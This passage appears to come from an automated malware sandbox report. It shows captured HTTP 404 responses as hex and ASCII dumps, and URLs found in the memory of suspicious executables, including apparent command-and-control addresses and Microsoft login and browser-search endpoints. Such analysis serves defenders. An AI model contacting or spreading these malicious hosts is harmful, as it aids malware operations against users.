20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:25:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:12 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:15 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:17 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:20 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:27:01 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 30 30 30 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 7a 68 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 69 67 68 74 20 64 61 72 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 66 66 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 0d 0a 20 20 20 20 20 20 20 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 37 20 54 68 65 20 43 68 72 6f 6d 69 75 6d 20 41 75 74 68 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 20 55 73 65 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 61 20 42 53 44 2d 73 74 79 6c 65 20 6c 69 63 65 6e 73 65 20 74 68 61 74 20 63 61 6e 20 62 65 20 2a 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 2e 20 2a 2f 20 61 20 7b 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6c 69 6e 6b 2d 63 6f 6c 6f 72 29 3b 20 7d 20 62 6f 64 79 20 7b 20 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 2d 2d 65 72 72 6f 72 2d 63 6f 64 65 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 37 30 30 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 31 30 30 3a 20 72 67 62 28 32 31 30 2c 20 32 32 37 2c 20 32 35 32 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 33 30 30 3a 20 72 67 62 28 31 33 38 2c 20 31 38 30 2c 20 32 34 38 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 36 30 30 3a 20 72 67 62 28 32 36 2c 20 31 31 35 2c 20 32 33 32 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 37 30 30 3a 20 72 67 62 28 32 35 2c 20 31 30 33 2c 20 32 31 30 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 31 30 30 3a 20 72 67 62 28 32 34 31 2c 20 32 34 33 2c 20 32 34 34 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 33 30 30 3a 20 72 67 62 28 32 31 38 2c 20 32 32 30 2c 20 32 32 34 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 35 30 30 3a 20 72 67 62 28 31 35 34 2c 20 31 36 30 2c 20 31 36 36 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 35 30 3a 20 72 67 62 28 32 34
              Source: chkntfs.exe, 0000000E.00000002.3707027734.0000000005B20000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004170000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lookstudiov.com/u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Q
              Source: aj34fjqh.exe, 00000018.00000002.3098875657.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: 8hd98EhtIFcYkb8.exeString found in binary or memory: http://www.opcom.ro/rapoarte/export_csv_raportPIPsiVolumTranzactionat_PI.php?zi=
              Source: 8hd98EhtIFcYkb8.exeString found in binary or memory: http://www.opcom.ro/rapoarte/export_xml_PIPsiVolTranPI.php?zi=
              Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3708009401.00000000058AA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xn--gotopia-bya.com
              Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3708009401.00000000058AA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xn--gotopia-bya.com/ynea/
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/bg/NameSiloLogo.png
              Source: chkntfs.exe, 0000000E.00000002.3694875633.0000000002A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: chkntfs.exe, 0000000E.00000002.3694875633.00000000029F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: chkntfs.exe, 0000000E.00000002.3694875633.0000000002A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: chkntfs.exe, 0000000E.00000002.3694875633.00000000029F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
